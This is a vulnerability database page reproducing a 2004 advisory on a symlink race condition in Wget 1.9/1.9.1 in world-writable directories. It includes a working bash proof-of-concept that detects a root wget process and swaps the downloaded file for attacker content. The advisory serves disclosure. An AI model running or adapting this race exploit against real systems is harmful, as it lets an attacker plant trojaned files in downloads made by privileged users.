Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

wgetuhoh.txt

🗓️ 18 May 2004 00:00:00Reported by Hugo VazquezType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 41 Views

Wget is vulnerable to symlink attacks during file downloads in world writable directories.

Code
`  
  
Tested software: Wget 1.9, Wget 1.9.1  
  
Wget checks for the presence of a file with the same name of the one invoqued at the command line, if the file exists, then it saves the downloaded file with a different name. The problem is that Wget does not lock the file, and directly writes to it. So there's a window time where Wget is exposed to a symlink attack  
(only on world writable directories)  
  
This is the attack sequence:  
  
1) Wget process starts  
2) File checking (but not locking!)  
<--- attacker creates symlink  
3) Wget writes on the wrong place  
  
  
As a P.o.C. here you have a very simple script that exploits this flaw with an attack I have called: "file hijacking".   
  
1)Open a shell and execute wget_race.sh with user A.  
2)Open another shell and with root user launch wget from /tmp:  
wget http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.26.bz2  
3) Check the content of /tmp/patch-2.4.26.bz2  
  
Smile :-)  
  
  
  
--------------- wget_race.sh ------------------------  
#!/bin/bash  
  
rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2  
echo "1">salida.txt  
a=`cat salida.txt`  
echo "Waiting for Wget execution..."  
  
while [ "$a" == 1 ]  
do  
ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt  
a=`cat salida.txt`  
done  
  
echo "Process catched!"  
pgrep -u root wget>pid.txt  
ln -s /dev/null /tmp/patch-2.4.26.bz2  
echo "/dev/null link created!"  
echo "Waiting for downloading to finish..."  
  
b=`pgrep -u root wget`  
touch $b.wget  
c=1  
while [ "$c" == 1 ]  
do  
if [ -e .wget ]  
then  
c=0  
echo "Downloading finished! Let's delete the original file, and put our trojaned file :-)"  
rm -f /tmp/patch-2.4.26.bz2  
echo "Surprise!">/tmp/patch-2.4.26.bz2  
echo "Does it worked?"  
  
ls -la /tmp/patch-2.4.26.bz2  
  
else  
b=`pgrep -u root wget`  
touch $b.wget  
  
fi  
  
done  
  
-----------------------------------------------------  
  
This flaw open a wide range of attack vectors.  
Any program wich runs wget from a world writable directory is vulnerable.  
  
  
  
Hugo Vazquez Caramés  
  
[email protected]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 May 2004 00:00Current
7.4High risk
Vulners AI Score7.4
wget version vulnerabilitiessymlink attackfile hijackingworld writable directories.
41